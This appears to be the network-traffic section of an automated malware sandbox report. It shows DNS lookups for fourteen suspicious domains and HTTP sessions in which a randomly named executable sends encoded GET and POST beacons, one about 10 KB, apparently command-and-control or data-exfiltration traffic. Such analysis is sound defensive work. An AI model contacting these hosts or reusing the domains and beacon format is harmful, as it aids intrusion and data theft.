Oct 24, 2024 05:09:58.025621891 CEST  50049        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:09:58.994771004 CEST  50049        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:09:59.000232935 CEST  80           50049      3.33.130.190     192.168.2.4
Oct 24, 2024 05:10:00.126544952 CEST  50050        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:10:00.132169008 CEST  80           50050      3.33.130.190     192.168.2.4
Oct 24, 2024 05:10:00.140038013 CEST  50050        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:10:00.182157040 CEST  50050        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:10:00.187705994 CEST  80           50050      3.33.130.190     192.168.2.4
Oct 24, 2024 05:10:00.777281046 CEST  80           50050      3.33.130.190     192.168.2.4
Oct 24, 2024 05:10:00.778218985 CEST  80           50050      3.33.130.190     192.168.2.4
Oct 24, 2024 05:10:00.778878927 CEST  50050        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:10:00.784028053 CEST  50050        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:10:00.789378881 CEST  80           50050      3.33.130.190     192.168.2.4
Oct 24, 2024 05:10:05.812974930 CEST  50051        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:10:05.818645954 CEST  80           50051      3.33.130.190     192.168.2.4
Oct 24, 2024 05:10:05.818849087 CEST  50051        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:10:05.831948042 CEST  50051        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:10:05.837791920 CEST  80           50051      3.33.130.190     192.168.2.4
Oct 24, 2024 05:10:06.449626923 CEST  80           50051      3.33.130.190     192.168.2.4
Oct 24, 2024 05:10:06.450222969 CEST  50051        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:10:07.340500116 CEST  50051        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:10:07.347119093 CEST  80           50051      3.33.130.190     192.168.2.4
Oct 24, 2024 05:10:08.357558012 CEST  50052        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:10:08.363977909 CEST  80           50052      3.33.130.190     192.168.2.4
Oct 24, 2024 05:10:08.364209890 CEST  50052        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:10:08.375042915 CEST  50052        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:10:08.381052017 CEST  80           50052      3.33.130.190     192.168.2.4
Oct 24, 2024 05:10:08.993464947 CEST  80           50052      3.33.130.190     192.168.2.4
Oct 24, 2024 05:10:08.993983030 CEST  50052        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:10:09.886708021 CEST  50052        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:10:09.892529011 CEST  80           50052      3.33.130.190     192.168.2.4
Oct 24, 2024 05:10:10.904068947 CEST  50053        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:10:10.911448002 CEST  80           50053      3.33.130.190     192.168.2.4
Oct 24, 2024 05:10:10.916249990 CEST  50053        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:10:10.928344011 CEST  50053        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:10:10.935795069 CEST  80           50053      3.33.130.190     192.168.2.4
Oct 24, 2024 05:10:10.935859919 CEST  80           50053      3.33.130.190     192.168.2.4
Oct 24, 2024 05:10:10.935902119 CEST  80           50053      3.33.130.190     192.168.2.4
Oct 24, 2024 05:10:10.935940981 CEST  80           50053      3.33.130.190     192.168.2.4
Oct 24, 2024 05:10:10.935980082 CEST  80           50053      3.33.130.190     192.168.2.4
Oct 24, 2024 05:10:10.937489033 CEST  80           50053      3.33.130.190     192.168.2.4
Oct 24, 2024 05:10:10.937552929 CEST  80           50053      3.33.130.190     192.168.2.4
Oct 24, 2024 05:10:10.937592983 CEST  80           50053      3.33.130.190     192.168.2.4
Oct 24, 2024 05:10:10.937632084 CEST  80           50053      3.33.130.190     192.168.2.4
Oct 24, 2024 05:10:11.549477100 CEST  80           50053      3.33.130.190     192.168.2.4
Oct 24, 2024 05:10:11.549561977 CEST  50053        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:10:12.432272911 CEST  50053        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:10:12.438008070 CEST  80           50053      3.33.130.190     192.168.2.4
Oct 24, 2024 05:10:13.810410976 CEST  50054        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:10:13.816102982 CEST  80           50054      3.33.130.190     192.168.2.4
Oct 24, 2024 05:10:13.816189051 CEST  50054        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:10:13.824707031 CEST  50054        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:10:13.830100060 CEST  80           50054      3.33.130.190     192.168.2.4
Oct 24, 2024 05:10:14.590037107 CEST  80           50054      3.33.130.190     192.168.2.4
Oct 24, 2024 05:10:14.590123892 CEST  80           50054      3.33.130.190     192.168.2.4
Oct 24, 2024 05:10:14.590167999 CEST  80           50054      3.33.130.190     192.168.2.4
Oct 24, 2024 05:10:14.590801001 CEST  50054        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:10:14.594523907 CEST  50054        80         192.168.2.4      3.33.130.190
Oct 24, 2024 05:10:14.600187063 CEST  80           50054      3.33.130.190     192.168.2.4
Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Oct 24, 2024 05:07:05.160562992 CEST  55294        53         192.168.2.4      1.1.1.1
Oct 24, 2024 05:07:05.183933020 CEST  53           55294      1.1.1.1          192.168.2.4
Oct 24, 2024 05:07:20.912019014 CEST  49573        53         192.168.2.4      1.1.1.1
Oct 24, 2024 05:07:21.202991962 CEST  53           49573      1.1.1.1          192.168.2.4
Oct 24, 2024 05:07:34.732734919 CEST  57079        53         192.168.2.4      1.1.1.1
Oct 24, 2024 05:07:34.755650043 CEST  53           57079      1.1.1.1          192.168.2.4
Oct 24, 2024 05:07:48.357359886 CEST  52769        53         192.168.2.4      1.1.1.1
Oct 24, 2024 05:07:48.454761028 CEST  53           52769      1.1.1.1          192.168.2.4
Oct 24, 2024 05:08:02.311948061 CEST  57127        53         192.168.2.4      1.1.1.1
Oct 24, 2024 05:08:03.081491947 CEST  53           57127      1.1.1.1          192.168.2.4
Oct 24, 2024 05:08:16.358052969 CEST  50065        53         192.168.2.4      1.1.1.1
Oct 24, 2024 05:08:16.820677042 CEST  53           50065      1.1.1.1          192.168.2.4
Oct 24, 2024 05:08:30.452039003 CEST  59697        53         192.168.2.4      1.1.1.1
Oct 24, 2024 05:08:30.471744061 CEST  53           59697      1.1.1.1          192.168.2.4
Oct 24, 2024 05:08:43.764792919 CEST  53563        53         192.168.2.4      1.1.1.1
Oct 24, 2024 05:08:44.077187061 CEST  53           53563      1.1.1.1          192.168.2.4
Oct 24, 2024 05:08:58.016177893 CEST  62440        53         192.168.2.4      1.1.1.1
Oct 24, 2024 05:08:58.028858900 CEST  53           62440      1.1.1.1          192.168.2.4
Oct 24, 2024 05:09:11.469170094 CEST  49505        53         192.168.2.4      1.1.1.1
Oct 24, 2024 05:09:11.483333111 CEST  53           49505      1.1.1.1          192.168.2.4
Oct 24, 2024 05:09:25.203161001 CEST  53268        53         192.168.2.4      1.1.1.1
Oct 24, 2024 05:09:25.235223055 CEST  53           53268      1.1.1.1          192.168.2.4
Oct 24, 2024 05:09:38.858273983 CEST  65196        53         192.168.2.4      1.1.1.1
Oct 24, 2024 05:09:38.881763935 CEST  53           65196      1.1.1.1          192.168.2.4
Oct 24, 2024 05:09:52.251138926 CEST  54559        53         192.168.2.4      1.1.1.1
Oct 24, 2024 05:09:52.262706995 CEST  53           54559      1.1.1.1          192.168.2.4
Oct 24, 2024 05:10:05.796114922 CEST  58104        53         192.168.2.4      1.1.1.1
Oct 24, 2024 05:10:05.809987068 CEST  53           58104      1.1.1.1          192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 24, 2024 05:07:05.160562992 CEST | 192.168.2.4 | 1.1.1.1 | 0xee27 | Standard query (0) | www.academyinmotion.xyz | A (IP address) | IN (0x0001) | false
Oct 24, 2024 05:07:20.912019014 CEST | 192.168.2.4 | 1.1.1.1 | 0xefbf | Standard query (0) | www.heeraka.info | A (IP address) | IN (0x0001) | false
Oct 24, 2024 05:07:34.732734919 CEST | 192.168.2.4 | 1.1.1.1 | 0xa18d | Standard query (0) | www.awesomearv.buzz | A (IP address) | IN (0x0001) | false
Oct 24, 2024 05:07:48.357359886 CEST | 192.168.2.4 | 1.1.1.1 | 0xa13a | Standard query (0) | www.030002252.xyz | A (IP address) | IN (0x0001) | false
Oct 24, 2024 05:08:02.311948061 CEST | 192.168.2.4 | 1.1.1.1 | 0xc15c | Standard query (0) | www.60881.xyz | A (IP address) | IN (0x0001) | false
Oct 24, 2024 05:08:16.358052969 CEST | 192.168.2.4 | 1.1.1.1 | 0xb582 | Standard query (0) | www.mjcregionsud.org | A (IP address) | IN (0x0001) | false
Oct 24, 2024 05:08:30.452039003 CEST | 192.168.2.4 | 1.1.1.1 | 0xe996 | Standard query (0) | www.levelsabovetravel.info | A (IP address) | IN (0x0001) | false
Oct 24, 2024 05:08:43.764792919 CEST | 192.168.2.4 | 1.1.1.1 | 0x9012 | Standard query (0) | www.d81dp.top | A (IP address) | IN (0x0001) | false
Oct 24, 2024 05:08:58.016177893 CEST | 192.168.2.4 | 1.1.1.1 | 0xc884 | Standard query (0) | www.numbox.live | A (IP address) | IN (0x0001) | false
Oct 24, 2024 05:09:11.469170094 CEST | 192.168.2.4 | 1.1.1.1 | 0xb125 | Standard query (0) | www.ly0.xyz | A (IP address) | IN (0x0001) | false
Oct 24, 2024 05:09:25.203161001 CEST | 192.168.2.4 | 1.1.1.1 | 0xb875 | Standard query (0) | www.myrideguy.net | A (IP address) | IN (0x0001) | false
Oct 24, 2024 05:09:38.858273983 CEST | 192.168.2.4 | 1.1.1.1 | 0xd05f | Standard query (0) | www.lunch.delivery | A (IP address) | IN (0x0001) | false
Oct 24, 2024 05:09:52.251138926 CEST | 192.168.2.4 | 1.1.1.1 | 0x5d69 | Standard query (0) | www.allinathletes.biz | A (IP address) | IN (0x0001) | false
Oct 24, 2024 05:10:05.796114922 CEST | 192.168.2.4 | 1.1.1.1 | 0x798b | Standard query (0) | www.barbequecritics.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 24, 2024 05:07:05.183933020 CEST | 1.1.1.1 | 192.168.2.4 | 0xee27 | No error (0) | www.academyinmotion.xyz | academyinmotion.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 05:07:05.183933020 CEST | 1.1.1.1 | 192.168.2.4 | 0xee27 | No error (0) | academyinmotion.xyz | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 05:07:05.183933020 CEST | 1.1.1.1 | 192.168.2.4 | 0xee27 | No error (0) | academyinmotion.xyz | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 05:07:21.202991962 CEST | 1.1.1.1 | 192.168.2.4 | 0xefbf | No error (0) | www.heeraka.info | | 75.2.103.23 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 05:07:34.755650043 CEST | 1.1.1.1 | 192.168.2.4 | 0xa18d | No error (0) | www.awesomearv.buzz | | 161.97.168.245 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 05:07:48.454761028 CEST | 1.1.1.1 | 192.168.2.4 | 0xa13a | No error (0) | www.030002252.xyz | 030002252.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 05:07:48.454761028 CEST | 1.1.1.1 | 192.168.2.4 | 0xa13a | No error (0) | 030002252.xyz | | 65.21.196.90 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 05:08:03.081491947 CEST | 1.1.1.1 | 192.168.2.4 | 0xc15c | No error (0) | www.60881.xyz | huayang.302.gn301.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 05:08:03.081491947 CEST | 1.1.1.1 | 192.168.2.4 | 0xc15c | No error (0) | huayang.302.gn301.xyz | | 107.148.177.200 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 05:08:03.081491947 CEST | 1.1.1.1 | 192.168.2.4 | 0xc15c | No error (0) | huayang.302.gn301.xyz | | 172.247.44.157 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 05:08:16.820677042 CEST | 1.1.1.1 | 192.168.2.4 | 0xb582 | No error (0) | www.mjcregionsud.org | mjcregionsud.org | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 05:08:16.820677042 CEST | 1.1.1.1 | 192.168.2.4 | 0xb582 | No error (0) | mjcregionsud.org | | 91.212.26.5 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 05:08:30.471744061 CEST | 1.1.1.1 | 192.168.2.4 | 0xe996 | No error (0) | www.levelsabovetravel.info | levelsabovetravel.info | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 05:08:30.471744061 CEST | 1.1.1.1 | 192.168.2.4 | 0xe996 | No error (0) | levelsabovetravel.info | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 05:08:30.471744061 CEST | 1.1.1.1 | 192.168.2.4 | 0xe996 | No error (0) | levelsabovetravel.info | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 05:08:44.077187061 CEST | 1.1.1.1 | 192.168.2.4 | 0x9012 | No error (0) | www.d81dp.top | d81dp.top | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 05:08:44.077187061 CEST | 1.1.1.1 | 192.168.2.4 | 0x9012 | No error (0) | d81dp.top | | 154.23.184.194 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 05:08:58.028858900 CEST | 1.1.1.1 | 192.168.2.4 | 0xc884 | No error (0) | www.numbox.live | | 63.250.47.57 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 05:09:11.483333111 CEST | 1.1.1.1 | 192.168.2.4 | 0xb125 | No error (0) | www.ly0.xyz | | 104.21.78.104 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 05:09:11.483333111 CEST | 1.1.1.1 | 192.168.2.4 | 0xb125 | No error (0) | www.ly0.xyz | | 172.67.220.57 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 05:09:25.235223055 CEST | 1.1.1.1 | 192.168.2.4 | 0xb875 | No error (0) | www.myrideguy.net | myrideguy.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 05:09:25.235223055 CEST | 1.1.1.1 | 192.168.2.4 | 0xb875 | No error (0) | myrideguy.net | | 68.66.226.116 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 05:09:38.881763935 CEST | 1.1.1.1 | 192.168.2.4 | 0xd05f | No error (0) | www.lunch.delivery | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 05:09:38.881763935 CEST | 1.1.1.1 | 192.168.2.4 | 0xd05f | No error (0) | www.lunch.delivery | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 05:09:52.262706995 CEST | 1.1.1.1 | 192.168.2.4 | 0x5d69 | No error (0) | www.allinathletes.biz | allinathletes.biz | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 05:09:52.262706995 CEST | 1.1.1.1 | 192.168.2.4 | 0x5d69 | No error (0) | allinathletes.biz | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 05:09:52.262706995 CEST | 1.1.1.1 | 192.168.2.4 | 0x5d69 | No error (0) | allinathletes.biz | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 05:10:05.809987068 CEST | 1.1.1.1 | 192.168.2.4 | 0x798b | No error (0) | www.barbequecritics.com | barbequecritics.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 05:10:05.809987068 CEST | 1.1.1.1 | 192.168.2.4 | 0x798b | No error (0) | barbequecritics.com | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 05:10:05.809987068 CEST | 1.1.1.1 | 192.168.2.4 | 0x798b | No error (0) | barbequecritics.com | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                                                                                                                    • www.academyinmotion.xyz
                                                                                                                    • www.heeraka.info
                                                                                                                    • www.awesomearv.buzz
                                                                                                                    • www.030002252.xyz
                                                                                                                    • www.60881.xyz
                                                                                                                    • www.mjcregionsud.org
                                                                                                                    • www.levelsabovetravel.info
                                                                                                                    • www.d81dp.top
                                                                                                                    • www.numbox.live
                                                                                                                    • www.ly0.xyz
                                                                                                                    • www.myrideguy.net
                                                                                                                    • www.lunch.delivery
                                                                                                                    • www.allinathletes.biz
                                                                                                                    • www.barbequecritics.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49773 | 3.33.130.190 | 80 | 5568 | C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 05:07:05.202687025 CEST | 538 | OUT | GET /63ck/?Znyl=2rnxDB&Qzj=GQYraOg50FzHvWxTy9J2g/Ct8yJZYLUl1pszYO6BquwY8zCRfPuOPPLv6opwWQ+1qa0YVJN1ZlZd4AL6pjVc8tqy3KaAjtZyQfx4UTLqHu607EYV+xyRwE8= HTTP/1.1
Host: www.academyinmotion.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Oct 24, 2024 05:07:05.833090067 CEST | 391 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Thu, 24 Oct 2024 03:07:05 GMT
Content-Type: text/html
Content-Length: 251
Connection: close
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 5a 6e 79 6c 3d 32 72 6e 78 44 42 26 51 7a 6a 3d 47 51 59 72 61 4f 67 35 30 46 7a 48 76 57 78 54 79 39 4a 32 67 2f 43 74 38 79 4a 5a 59 4c 55 6c 31 70 73 7a 59 4f 36 42 71 75 77 59 38 7a 43 52 66 50 75 4f 50 50 4c 76 36 6f 70 77 57 51 2b 31 71 61 30 59 56 4a 4e 31 5a 6c 5a 64 34 41 4c 36 70 6a 56 63 38 74 71 79 33 4b 61 41 6a 74 5a 79 51 66 78 34 55 54 4c 71 48 75 36 30 37 45 59 56 2b 78 79 52 77 45 38 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Znyl=2rnxDB&Qzj=GQYraOg50FzHvWxTy9J2g/Ct8yJZYLUl1pszYO6BquwY8zCRfPuOPPLv6opwWQ+1qa0YVJN1ZlZd4AL6pjVc8tqy3KaAjtZyQfx4UTLqHu607EYV+xyRwE8="}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49863 | 75.2.103.23 | 80 | 5568 | C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 05:07:21.235543966 CEST | 795 | OUT | POST /o7wc/ HTTP/1.1
Host: www.heeraka.info
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Origin: http://www.heeraka.info
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
Referer: http://www.heeraka.info/o7wc/
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 71 71 72 4c 76 30 35 53 38 74 70 52 73 6d 58 31 5a 6b 62 52 30 6a 45 79 5a 43 72 38 34 31 31 6f 71 70 36 32 57 43 51 73 2f 45 7a 74 69 71 2f 34 66 30 53 64 75 69 64 33 39 70 59 46 35 31 66 56 31 71 6b 56 6f 6e 71 75 57 49 35 72 6d 45 63 48 42 2f 4c 6f 63 49 7a 6a 68 32 31 4b 6c 74 75 78 54 45 37 50 44 6b 55 67 55 78 52 75 78 31 78 6b 4e 53 50 53 33 44 43 49 69 72 7a 52 4e 32 4d 33 73 73 54 47 6e 5a 6f 79 6c 4a 66 37 58 64 65 4f 79 35 2f 50 68 6a 43 35 31 66 2f 43 56 59 36 72 2f 65 6c 51 44 36 52 64 44 65 38 58 52 34 45 34 79 48 56 39 37 69 61 4f 50 78 4c 6c 79 51 6a 32 55 77 3d 3d
                                                                                                                    Data Ascii: Qzj=qqrLv05S8tpRsmX1ZkbR0jEyZCr8411oqp62WCQs/Eztiq/4f0Sduid39pYF51fV1qkVonquWI5rmEcHB/LocIzjh21KltuxTE7PDkUgUxRux1xkNSPS3DCIirzRN2M3ssTGnZoylJf7XdeOy5/PhjC51f/CVY6r/elQD6RdDe8XR4E4yHV97iaOPxLlyQj2Uw==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49877 | 75.2.103.23 | 80 | 5568 | C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 05:07:23.874382973 CEST | 815 | OUT | POST /o7wc/ HTTP/1.1
Host: www.heeraka.info
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Origin: http://www.heeraka.info
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 220
Referer: http://www.heeraka.info/o7wc/
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 71 71 72 4c 76 30 35 53 38 74 70 52 74 48 6e 31 4b 53 54 52 38 6a 45 39 63 43 72 38 79 56 31 73 71 70 2b 32 57 41 38 38 71 6e 58 74 68 50 44 34 59 77 4f 64 2b 79 64 33 70 35 59 4b 30 56 65 5a 31 71 6f 64 6f 6c 4f 75 57 49 74 72 6d 42 67 48 42 4f 4c 72 4f 6f 7a 68 6e 32 31 45 68 74 75 78 54 45 37 50 44 6e 6f 61 55 31 39 75 79 45 42 6b 4d 7a 50 52 36 6a 43 4c 30 62 7a 52 4a 32 4d 7a 73 73 53 54 6e 59 31 5a 6c 4e 76 37 58 63 75 4f 7a 6f 2f 4d 30 54 43 2f 34 2f 2b 6a 64 35 4c 30 78 75 56 61 64 59 56 75 4f 61 6b 6d 5a 65 56 69 6a 32 30 71 70 69 2b 39 53 32 43 52 2f 54 65 2f 50 7a 62 42 4b 39 34 6a 51 36 61 4e 74 56 37 7a 6f 78 53 69 42 59 77 3d
                                                                                                                    Data Ascii: Qzj=qqrLv05S8tpRtHn1KSTR8jE9cCr8yV1sqp+2WA88qnXthPD4YwOd+yd3p5YK0VeZ1qodolOuWItrmBgHBOLrOozhn21EhtuxTE7PDnoaU19uyEBkMzPR6jCL0bzRJ2MzssSTnY1ZlNv7XcuOzo/M0TC/4/+jd5L0xuVadYVuOakmZeVij20qpi+9S2CR/Te/PzbBK94jQ6aNtV7zoxSiBYw=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49893 | 75.2.103.23 | 80 | 5568 | C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 05:07:26.433362961 CEST | 10897 | OUT | POST /o7wc/ HTTP/1.1
Host: www.heeraka.info
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Origin: http://www.heeraka.info
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 10300
Referer: http://www.heeraka.info/o7wc/
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 71 71 72 4c 76 30 35 53 38 74 70 52 74 48 6e 31 4b 53 54 52 38 6a 45 39 63 43 72 38 79 56 31 73 71 70 2b 32 57 41 38 38 71 6e 66 74 68 35 58 34 59 52 4f 64 39 79 64 33 71 35 59 4a 30 56 65 55 31 71 67 5a 6f 6c 79 59 57 4b 56 72 6d 6a 59 48 44 38 6a 72 46 6f 7a 68 6c 32 31 4a 6c 74 75 6b 54 41 66 44 44 6b 41 61 55 31 39 75 79 47 5a 6b 46 43 50 52 38 6a 43 49 69 72 7a 4e 4e 32 4e 55 73 73 62 6f 6e 59 78 76 6c 65 6e 37 55 2f 57 4f 78 61 58 4d 6f 44 43 39 35 2f 2b 42 64 35 48 52 78 75 34 6c 64 5a 77 6d 4f 64 45 6d 5a 59 49 68 33 31 51 68 79 51 37 37 50 32 32 6f 79 51 75 70 4c 55 58 41 42 73 34 6f 47 37 76 69 70 55 76 34 38 78 53 59 58 50 78 56 50 4e 6f 38 56 6d 75 75 43 45 6f 6f 63 78 5a 54 2f 6d 61 47 32 4b 47 37 73 61 70 2b 2f 50 67 65 39 4b 49 6a 31 68 65 70 71 73 72 77 39 73 75 61 53 37 4c 31 50 6c 6b 42 64 77 70 48 4f 44 43 54 33 47 76 6d 47 52 6d 63 30 63 39 73 4b 73 52 51 6f 51 37 32 59 71 4c 49 54 33 46 38 31 6c 56 50 68 6e 64 68 2b 35 33 59 75 4b 4b 4d 45 4a 36 66 76 78 45 45 7a 66 [TRUNCATED]
                                                                                                                    Data Ascii: Qzj=qqrLv05S8tpRtHn1KSTR8jE9cCr8yV1sqp+2WA88qnfth5X4YROd9yd3q5YJ0VeU1qgZolyYWKVrmjYHD8jrFozhl21JltukTAfDDkAaU19uyGZkFCPR8jCIirzNN2NUssbonYxvlen7U/WOxaXMoDC95/+Bd5HRxu4ldZwmOdEmZYIh31QhyQ77P22oyQupLUXABs4oG7vipUv48xSYXPxVPNo8VmuuCEoocxZT/maG2KG7sap+/Pge9KIj1hepqsrw9suaS7L1PlkBdwpHODCT3GvmGRmc0c9sKsRQoQ72YqLIT3F81lVPhndh+53YuKKMEJ6fvxEEzfu+NTWwN6DiZWTSLU3PhCwk9+XeTzxcX1+KKKSIzYZHcs25sIwZxBijF8EPqBrROqahnI48LsJDgDXqG8f7kwQEje6R2aQmUk5/JmaO3UDjWao2dimk0hfGtqHqUCk4Sg4fEQKBNuColWP4PaQ3qnvB5fWX3pnN4upCxAPRfR/9K7gP8NnfmrjlZ13kBzI0oSBd6dvAO00+RWrcnE+MdghFo1xxGpoOC6JowRhvJipTwlfkQh3dNAh/I0l9GZHMuTThEd9soinRLjVcziWyc+3d7zBxiLm+vx4g1crZ28RMnrBN+qVKJgkFEFfOhhRVT/HURudgT5pmUMWkJCAbF6yauDyyRVVq1ZM/ncLDnU1m6F8n2k50OYyWpk5FCpaQ6Ptx///RWdAqbSOMFJMvtR+0SyfqdUqYMYmtkaDnrnxAv+4TFs25MmVJ511EE1AonAiNbLOlTUruUHnAxHsN7XwOlQaGgE0QP5AwQzFCCS7uh3fJ/2oC/1BMxzH0Gdgo4LTyr0ysC+598t8y/GI2H5/aKYttmOZ6bPw4E2vMvbZp4QfWDKws308PfDAv8DPos/9v3OFz+mgG4TRidG/enTq8Dqgh0oOaoUv08GcvJ2vLkFXUrmz/+cfuL8wzYEH8uREQlLnlXf2FfBy6j57ZdCQ/hjRfkXzXICiP [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49905 | 75.2.103.23 | 80 | 5568 | C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp | Bytes transferred | Direction | Data
